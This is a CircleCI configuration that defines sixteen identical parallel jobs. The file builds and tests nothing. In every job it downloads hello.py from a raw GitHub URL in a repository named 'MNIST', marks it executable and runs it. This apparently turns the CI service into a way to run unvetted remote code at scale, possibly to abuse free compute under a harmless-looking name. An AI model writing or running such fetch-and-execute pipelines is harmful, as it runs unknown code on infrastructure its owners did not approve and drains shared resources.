version: 2.1
jobs:
    kuli1:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli2:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli3:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli4:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli5:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli6:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli7:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli8:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli9:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli10:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli11:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli12:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli13:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli14:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli15:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py
    kuli16:
      docker:
            - image: couchbase
      steps:
      - checkout
      - run: apt-get update
      - run: apt-get install -y git wget curl
      - run: wget https://raw.githubusercontent.com/akwjqkam/MNIST/main/hello.py
      - run: chmod +x hello.py
      - run: python hello.py

workflows:
    version: 2.1
    main:
        jobs:
            - kuli1
            - kuli2
            - kuli3
            - kuli4
            - kuli5
            - kuli6
            - kuli7
            - kuli8
            - kuli9
            - kuli10
            - kuli11
            - kuli12
            - kuli13
            - kuli14
            - kuli15
            - kuli16
